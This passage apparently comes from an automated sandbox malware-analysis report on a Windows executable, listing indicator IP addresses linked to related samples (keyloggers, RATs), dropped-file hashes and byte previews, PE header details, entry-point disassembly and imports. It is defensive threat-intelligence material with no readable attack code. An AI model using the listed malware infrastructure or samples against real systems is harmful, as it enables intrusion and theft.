                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    14DQLvW18s.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    DF15669F7F948ABD95D1A4C326AA0443F0CC534513B25.exeGet hashmaliciousNjrat, STRRAT, WSHRATBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    FiveM-CheatHub.exeGet hashmaliciousDiscord Token Stealer, MercurialGrabber, OrcusBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    omnis.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    omnis.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    information_20_mar.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    information_20_mar.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    bV.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                    • 172.67.156.49
                                                                                                                                                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                                                                                                                                                    • 5.189.171.125
                                                                                                                                                                                                                                                                                                    • 185.237.66.112
                                                                                                                                                                                                                                                                                                    • 188.114.96.3
                                                                                                                                                                                                                                                                                                    • 91.229.22.126
                                                                                                                                                                                                                                                                                                    • 172.67.164.178
                                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                    C:\Users\user\pigalicapi.exemj3Lf2ulDf.exeGet hashmaliciousAmadey, Djvu, SmokeLoaderBrowse
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.168829563685559
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:/lSll2DQi:AoMi
                                                                                                                                                                                                                                                                                                      MD5:DAB633BEBCCE13575989DCFA4E2203D6
                                                                                                                                                                                                                                                                                                      SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                                                                                                                                                                                                                                                                                                      SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                                                                                                                                                                                                                                                                                                      SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................user.
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      File Type:Matlab v4 mat-file (little endian) , sparse, rows 0, columns 22
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):1446
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.416007513142872
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:EtPRDylURga5drbvrlpc766+VJH9C128zWGdZNuqrIAo6D3IA6txbE9xu:EtP5ylURVrrlEA39IzWGRuqIQ3I9bEi
                                                                                                                                                                                                                                                                                                      MD5:A36C703963B3D83911B4B163BFFBEF84
                                                                                                                                                                                                                                                                                                      SHA1:212176E9967846628EC06D95983D83BBA9515F49
                                                                                                                                                                                                                                                                                                      SHA-256:0E5D0BD68E411D0032BAEDAA13CB2BDF27C898BC4B901B96BC031FCBB3570AE7
                                                                                                                                                                                                                                                                                                      SHA-512:495D6FF03CDF1110A03C486E4DFCDB063EAF8DBCE08EF493CE766123982E71E24203FE9B02A17D611AC43AE4C7DB58643E2A5F4E690769D938F32DEC49C43965
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:........................................MyDefaultKeyContainer.RSA1.................O...E.oe.`V...r3.wI_.-.T.<3x.).L..y]P.....|R.]..W.>.......y!z..>b...RO...].;d.'.wqX...........<r.$`*...G6.t6Vb.93B...R......................z..O......v.c.].nH..........,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ...%.}H..J.C.g.....K...bG.d..(c=............. .......@...7E.w...E.~.....4.....o.........IBR^8P.....d.....$..m.B(..0L3.)...l..l...<x...I..J..!....../.\L....&....d......E..Y.=[-...t..r.E:..-k2.......$.@..B{{......>f8z...6....E....feD.....]....EbR...g..C(6).m^.....3.%&."M..Tlu..........9..8>D.......V..!.}..H(....J..XE..t......U6.........A...[P5.W..v.. .......QA..7)/.|.$.6i/Th6....#..sm..PV,_.95.!..oD....9....i....x...a.7....]I..8.. N.K.'j..5...u4.;W-.=d.|..]...r9.[{?dy.....St..oW.p.6/..7[.L7.....+.{.......-e.\........n..,\.t...tu......|.:~y..)...hX..P^.....kA.H....I.]"{.f#}N....^A.r-x...y...~...A.MaG%...fDU....a#......!s.p.L...i8`.z,..SG. .U..$Nw.
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):259072
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.79469395524113
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:UYf6pfKeeeeeeuPUn+AQTGTDFNDlzZID9+K7JPF:T6pieeeeeeupIDT7II0j
                                                                                                                                                                                                                                                                                                      MD5:9FAEA65CFF61AD64E4BC4C3913C336BE
                                                                                                                                                                                                                                                                                                      SHA1:4FAC3A2B3E76EE1B31A369ED53D145218952A340
                                                                                                                                                                                                                                                                                                      SHA-256:987204CA82337F0A3F28097A5D66D5F3ECB11D43D82F67CD753D0BF2CE40B7A7
                                                                                                                                                                                                                                                                                                      SHA-512:A0F3AD6C82C5FB830DD1C7A3A10E2B4CEE2E2C7B02527A64A87A0B11CE16961A6FCABB74635822882F3C689A3A7283256BC97A5499C8022F8F53F9950210C142
                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                                      • Filename: mj3Lf2ulDf.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.d..........................................@..........................`......"......... ......................0...s...............W...................@..........................................................(............................text..............................`.P`.data....J.......L..................@.`..rdata...).......*..................@.`@.bss......... ........................`..edata...s...0...t..................@.0@.idata...............p..............@.0..CRT....8...........................@.0..tls.... ...........................@.0..rsrc....W.......X..................@.0..reloc.......@......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.79469395524113
                                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                      • VXD Driver (31/22) 0.00%
                                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                      File name:6gjnnBAbpc.exe
                                                                                                                                                                                                                                                                                                      File size:259072
                                                                                                                                                                                                                                                                                                      MD5:9faea65cff61ad64e4bc4c3913c336be
                                                                                                                                                                                                                                                                                                      SHA1:4fac3a2b3e76ee1b31a369ed53d145218952a340
                                                                                                                                                                                                                                                                                                      SHA256:987204ca82337f0a3f28097a5d66d5f3ecb11d43d82f67cd753d0bf2ce40b7a7
                                                                                                                                                                                                                                                                                                      SHA512:a0f3ad6c82c5fb830dd1c7a3a10e2b4cee2e2c7b02527a64a87a0b11ce16961a6fcabb74635822882f3c689a3a7283256bc97a5499c8022f8f53f9950210c142
                                                                                                                                                                                                                                                                                                      SSDEEP:6144:UYf6pfKeeeeeeuPUn+AQTGTDFNDlzZID9+K7JPF:T6pieeeeeeupIDT7II0j
                                                                                                                                                                                                                                                                                                      TLSH:C6444B18DE73AC75DCE304731052FE7AF1799E824B266B91F7849EBBE46286D70042D8
                                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....L.d..........................................@..........................`......"......... ......................0...s.
                                                                                                                                                                                                                                                                                                      Icon Hash:7af8e0c2f288c9b2
                                                                                                                                                                                                                                                                                                      Entrypoint:0x4014e0
                                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                                                                                      DLL Characteristics:
                                                                                                                                                                                                                                                                                                      Time Stamp:0x64184C09 [Mon Mar 20 12:05:29 2023 UTC]
                                                                                                                                                                                                                                                                                                      TLS Callbacks:0x40ca60, 0x40ca10, 0x410a40
                                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                      OS Version Major:4
                                                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                                                      File Version Major:4
                                                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                      Import Hash:6e82b26469ac662e23ea9fbbf84e95db
                                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                                      sub esp, 0Ch
                                                                                                                                                                                                                                                                                                      mov dword ptr [00422054h], 00000001h
                                                                                                                                                                                                                                                                                                      call 00007FD3651734E3h
                                                                                                                                                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                                                                                                                                                      jmp 00007FD36516720Bh
                                                                                                                                                                                                                                                                                                      lea esi, dword ptr [esi+00000000h]
                                                                                                                                                                                                                                                                                                      sub esp, 0Ch
                                                                                                                                                                                                                                                                                                      mov dword ptr [00422054h], 00000000h
                                                                                                                                                                                                                                                                                                      call 00007FD3651734C3h
                                                                                                                                                                                                                                                                                                      add esp, 0Ch
                                                                                                                                                                                                                                                                                                      jmp 00007FD3651671EBh
                                                                                                                                                                                                                                                                                                      nop
                                                                                                                                                                                                                                                                                                      nop
                                                                                                                                                                                                                                                                                                      nop
                                                                                                                                                                                                                                                                                                      nop
                                                                                                                                                                                                                                                                                                      nop
                                                                                                                                                                                                                                                                                                      nop
                                                                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                                                                      push edi
                                                                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                                                                      sub esp, 0000008Ch
                                                                                                                                                                                                                                                                                                      mov dword ptr [ebp-54h], 00418AA0h
                                                                                                                                                                                                                                                                                                      mov dword ptr [ebp-50h], 004190F4h
                                                                                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-4Ch]
                                                                                                                                                                                                                                                                                                      lea ecx, dword ptr [ebp-18h]
                                                                                                                                                                                                                                                                                                      mov dword ptr [eax], ecx
                                                                                                                                                                                                                                                                                                      mov edx, 004016A7h
                                                                                                                                                                                                                                                                                                      mov dword ptr [eax+04h], edx
                                                                                                                                                                                                                                                                                                      mov dword ptr [eax+08h], esp
                                                                                                                                                                                                                                                                                                      lea eax, dword ptr [ebp-6Ch]
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp], eax
                                                                                                                                                                                                                                                                                                      call 00007FD3651741CDh
                                                                                                                                                                                                                                                                                                      mov dword ptr [ebp-1Ch], 00000000h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+18h], 00000000h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+14h], 00000000h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+10h], 00000003h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+0Ch], 00000000h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+08h], 00000001h
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp+04h], 80000000h
                                                                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                                                                                                      mov dword ptr [esp], eax
                                                                                                                                                                                                                                                                                                      mov eax, dword ptr [0042B2D4h]
                                                                                                                                                                                                                                                                                                      mov dword ptr [ebp-68h], FFFFFFFFh
                                                                                                                                                                                                                                                                                                      call eax
                                                                                                                                                                                                                                                                                                      sub esp, 1Ch
                                                                                                                                                                                                                                                                                                      mov dword ptr [ebp+00h], eax
                                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x230000x73dc.edata
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2b0000xfa8.idata
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x157d4.rsrc
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x440000x1604.reloc
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x2d0000x18.tls
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2b2b40x228.idata
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                      .text0x10000x181f40x18200False0.3972433613989637data5.9030621283777664IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                      .data0x1a0000x4a800x4c00False0.006064967105263158data0.03762435831140418IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                      .rdata0x1f0000x29b40x2a00False0.3423549107142857data5.334239092407127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                      .bss0x220000x4980x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                      .edata0x230000x73dc0x7400False0.7158203125data6.216485591208954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                      .idata0x2b0000xfa80x1000False0.397705078125PGP symmetric key encrypted data - Plaintext or unencrypted data5.301412463611171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                      .CRT0x2c0000x380x200False0.07421875Matlab v4 mat-file (little endian) \360\312@, numeric, rows 4198704, columns 00.31735749529006907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                      .tls0x2d0000x200x200False0.05078125data0.22091378450968063IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                      .rsrc0x2e0000x157d40x15800False0.7982944222383721data7.78460791495336IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                      .reloc0x440000x16040x1800False0.75537109375data6.441087456149082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                                                                                      OMT0x2e1800xadadataEnglishUnited States
                                                                                                                                                                                                                                                                                                      OMT0x2ec5c0x14800dataEnglishUnited States
                                                                                                                                                                                                                                                                                                      RT_ICON0x4345c0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                                                                                                                      RT_MENU0x437440x7adataEnglishUnited States
                                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x437c00x14dataEnglishUnited States
                                                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                                                      COMDLG32.DLLGetOpenFileNameA, GetSaveFileNameA
                                                                                                                                                                                                                                                                                                      GDI32.dllGetStockObject
                                                                                                                                                                                                                                                                                                      KERNEL32.dllAddAtomA, CloseHandle, CreateEventA, CreateFileA, CreateMutexA, CreateSemaphoreA, DeleteCriticalSection, DuplicateHandle, EnterCriticalSection, ExitProcess, FindAtomA, GetAtomNameA, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetFileSize, GetHandleInformation, GetLastError, GetModuleHandleA, GetProcessAffinityMask, GetStartupInfoA, GetSystemTimeAsFileTime, GetThreadContext, GetThreadPriority, GetTickCount, GlobalAlloc, GlobalFree, InitializeCriticalSection, InterlockedCompareExchange, InterlockedDecrement, InterlockedExchange, InterlockedExchangeAdd, InterlockedIncrement, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, ReleaseMutex, ReleaseSemaphore, ResetEvent, ResumeThread, SetEvent, SetLastError, SetProcessAffinityMask, SetThreadContext, SetThreadPriority, SetUnhandledExceptionFilter, Sleep, SuspendThread, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnhandledExceptionFilter, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WriteFile
                                                                                                                                                                                                                                                                                                      msvcrt.dll__dllonexit, __getmainargs, __initenv, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _beginthreadex, _cexit, _endthreadex, _fmode, _ftime, _initterm, _iob, _lock, _onexit, _setjmp3, _unlock, _write, abort, calloc, exit, fprintf, fputc, fputs, free, fwrite, longjmp, malloc, memcmp, memmove, printf, realloc, signal, sprintf, strcmp, strncmp, vfprintf
